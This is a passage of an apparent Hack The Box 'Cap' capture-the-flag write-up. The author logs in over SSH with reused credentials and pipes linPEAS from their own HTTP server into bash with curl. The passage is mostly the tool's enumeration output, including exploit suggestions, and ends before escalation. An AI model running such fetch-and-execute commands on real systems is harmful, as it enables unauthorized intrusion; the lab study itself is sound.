REDACTEDGot the user flag stored in current working directory
Next, we have to find the root flag
There’s service available in ssh, let’s accessing it using same credential as well
nopedawn@npdn ~/L/H/S/Cap> ssh nathan@10.129.19.17
The authenticity of host '10.129.19.17 (10.129.19.17)' can't be established.
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:63: [hashed name]
~/.ssh/known_hosts:65: [hashed name]
~/.ssh/known_hosts:66: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.19.17' (ED25519) to the list of known hosts.
nathan@10.129.19.17's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 7 04:38:09 UTC 2026
System load: 0.0
Usage of /: 36.7% of 8.73GB
Memory usage: 21%
Swap usage: 0%
Processes: 225
Users logged in: 0
IPv4 address for eth0: 10.129.19.17
IPv6 address for eth0: dead:beef::250:56ff:feb9:6015
=> There are 2 zombie processes.
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ whoami
nathan
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)To get the root flag we need to performing privillege escalation to enter as a root user
To do this, I’ll use linPEAS script to check potential attack from the linux machine
First I’ll start to enable http server using python, this script will be triggered and executed after we running the command in the machine
D:\HTB\Machines\Cap>python -m http.server 8481
Serving HTTP on :: port 8481 (http://[::]:8481/) ...Back to machine, run this command to execute the script,
curl http://10.10.17.182:8481/linpeas.sh | bashMake sure to change the ip to your own htb vpn ip
D:\HTB\Machines\Cap>ipconfig
Windows IP Configuration
Unknown adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : ████:████:████::████
Link-local IPv6 Address . . . . . : ████::████:████:████:████
IPv4 Address. . . . . . . . . . . : 10.10.17.182
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . :Now let’s run it
nathan@cap:~$ curl http://10.10.17.182:8481/linpeas.sh | bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
| --------------------------------------------------------------------------------- |
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
| --------------------------------------------------------------------------------- |
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
23 833k 23 196k 0 0 52212 0 0:00:16 0:00:03 0:00:13 52198 ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021
User & Groups: uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
Hostname: cap
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
47 833k 47 396k 0 0 18997 0 0:00:44 0:00:21 0:00:23 18997DONE. . . . . . . . . . . .
59 833k 59 496k 0 0 22075 0 0:00:38 0:00:23 0:00:15 22075 ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021
Distributor ID: Ubuntu
Description: Ubuntu 20.04.2 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
╔══════════╣ Date & uptime
Tue Apr 7 05:07:46 UTC 2026
05:07:46 up 2:51, 1 user, load average: 0.28, 0.07, 0.02
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3
sda4
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/disk/by-id/dm-uuid-LVM-2om9fd1B3Q2r7E8yJyxwbZF4JCSUIQCqYgbAERHfSMVI2q5K9TyUTeGzFxbyZN4a / ext4 defaults 0 0
/dev/disk/by-uuid/d3d1cf9e-20c6-450f-b152-9854f6a804ad /boot ext4 defaults 0 0
/dev/sda4 none swap sw 0 0
proc /proc proc defaults,hidepid=2 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
SHELL=/bin/bash
HISTSIZE=0
PWD=/home/nathan
LOGNAME=nathan
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/nathan
LANG=C.UTF-8
HISTFILE=/dev/null
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.10.17.182 53376 10.129.19.17 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=nathan
SHLVL=1
XDG_SESSION_ID=8
XDG_RUNTIME_DIR=/run/user/1001
SSH_CLIENT=10.10.17.182 53376 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
HISTFILESIZE=0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
SSH_TTY=/dev/pts/0
_=/usr/bin/env
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
/snap/bin/lxc
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ Aliyun ECS? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users
nathan 6212 0.0 0.2 7020 4912 pts/0 Ss 04:53 0:00 -bash
nathan 6583 0.0 0.5 23544 10736 pts/0 S+ 05:07 0:00 _ curl http://10.10.17.182:8481/linpeas.sh
nathan 6584 0.8 0.2 7760 5744 pts/0 S+ 05:07 0:00 _ bash
nathan 9855 0.0 0.1 7760 3912 pts/0 S+ 05:08 0:00 _ bash
nathan 9858 0.0 0.1 7648 3320 pts/0 R+ 05:08 0:00 | _ ps fauxwww
nathan 9857 0.0 0.1 7760 2520 pts/0 R+ 05:08 0:00 _ bash
nathan 9859 0.0 0.1 7760 2520 pts/0 S+ 05:08 0:00 _ bash
nathan 6127 0.0 0.4 18428 9700 ? Ss 04:53 0:00 /lib/systemd/systemd --user
nathan 9736 0.0 0.1 7108 3988 ? Ss 05:07 0:00 _ /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Jul 31 2020 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all
-rw-r--r-- 1 root root 190 Jul 31 2020 popularity-contest
/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 May 31 2021 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 376 Dec 4 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
-rwxr-xr-x 1 root root 214 Apr 2 2020 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jul 31 2020 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jul 31 2020 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 May 23 2021 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 211 Apr 2 2020 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/atd.service could be executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2026-04-07 06:16:54 UTC 1h 8min left Tue 2026-04-07 02:39:39 UTC 2h 28min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Tue 2026-04-07 10:36:11 UTC 5h 27min left Sun 2021-05-23 18:36:01 UTC 4 years 10 months ago fwupd-refresh.timer fwupd-refresh.service
Tue 2026-04-07 11:43:00 UTC 6h left Sun 2021-05-23 18:36:01 UTC 4 years 10 months ago apt-daily.timer apt-daily.service
Tue 2026-04-07 14:36:28 UTC 9h left Tue 2026-04-07 04:29:12 UTC 39min ago motd-news.timer motd-news.service
Tue 2026-04-07 15:11:41 UTC 10h left Tue 2026-04-07 03:09:01 UTC 1h 59min ago ua-messaging.timer ua-messaging.service
Wed 2026-04-08 00:00:00 UTC 18h left Tue 2026-04-07 02:16:55 UTC 2h 51min ago logrotate.timer logrotate.service
Wed 2026-04-08 00:00:00 UTC 18h left Tue 2026-04-07 02:16:55 UTC 2h 51min ago man-db.timer man-db.service
Wed 2026-04-08 02:31:19 UTC 21h left Tue 2026-04-07 02:31:19 UTC 2h 37min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2026-04-12 03:10:24 UTC 4 days left Tue 2026-04-07 02:17:23 UTC 2h 50min ago e2scrub_all.timer e2scrub_all.service
Mon 2026-04-13 00:00:00 UTC 5 days left Tue 2026-04-07 02:16:55 UTC 2h 51min ago fstrim.timer fstrim.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/snap/core18/2066/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2066/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2066/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2074/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2074/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
└─(Read Write)
/run/irqbalance//irqbalance1031.sock
└─(Read )
/run/irqbalance/irqbalance1031.sock
└─(Read )
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
└─(Read Write)
/run/snapd.socket
└─(Read Write)
/run/systemd/journal/dev-log
└─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
└─(Read Write)
/run/systemd/journal/stdout
└─(Read Write)
/run/systemd/journal/syslog
└─(Read Write)
/run/systemd/notify
└─(Read Write)
/run/systemd/private
└─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
└─(Read Write)
/run/udev/control
/run/user/1001/bus
└─(Read Write)
/run/user/1001/gnupg/S.dirmngr
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.browser
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.extra
└─(Read Write)
/run/user/1001/gnupg/S.gpg-agent.ssh
└─(Read Write)
/run/user/1001/pk-debconf-socket
└─(Read Write)
/run/user/1001/snapd-session-agent.socket
└─(Read Write)
/run/user/1001/systemd/notify
└─(Read Write)
/run/user/1001/systemd/private
└─(Read Write)
/run/uuidd/request
└─(Read Write)
/run/vmware/guestServicePipe
└─(Read Write)
/var/run/vmware/guestServicePipe
└─(Read Write)
/var/snap/lxd/common/lxd/unix.socket
╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
╔══════════╣ D-Bus Service Objects list
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION
:1.0 - - - - - - -
:1.1 - - - - - - -
:1.15 - - - - - - -
:1.2 - - - - - - -
:1.21 - - - - - - -
:1.4 - - - - - - -
:1.5 - - - - - - -
:1.6 - - - - - - -
:1.7 - - - - - - -
:1.8 - - - - - - -
com.ubuntu.LanguageSelector - - - (activatable) - - -
com.ubuntu.SoftwareProperties - - - (activatable) - - -
org.freedesktop.Accounts - - - - - - -
org.freedesktop.DBus - - - - - - -
org.freedesktop.PackageKit - - - (activatable) - - -
org.freedesktop.PolicyKit1 - - - - - - -
org.freedesktop.UPower - - - (activatable) - - -
org.freedesktop.bolt - - - (activatable) - - -
org.freedesktop.fwupd - - - (activatable) - - -
org.freedesktop.hostname1 - - - (activatable) - - -
org.freedesktop.locale1 - - - (activatable) - - -
org.freedesktop.login1 - - - - - - -
org.freedesktop.network1 - - - - - - -
org.freedesktop.resolve1 - - - - - - -
org.freedesktop.systemd1 - - - - - - -
org.freedesktop.thermald - - - (activatable) - - -
org.freedesktop.timedate1 - - - (activatable) - - -
org.freedesktop.timesync1 - - - - - - -
╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
cap
127.0.0.1 localhost
127.0.0.1 cap
nameserver 127.0.0.53
options edns0 trust-ad
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.19.17 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb9:6015 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:6015 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:60:15 txqueuelen 1000 (Ethernet)
RX packets 14102 bytes 2212760 (2.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9829 bytes 2117427 (2.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 11558 bytes 909491 (909.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11558 bytes 909491 (909.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
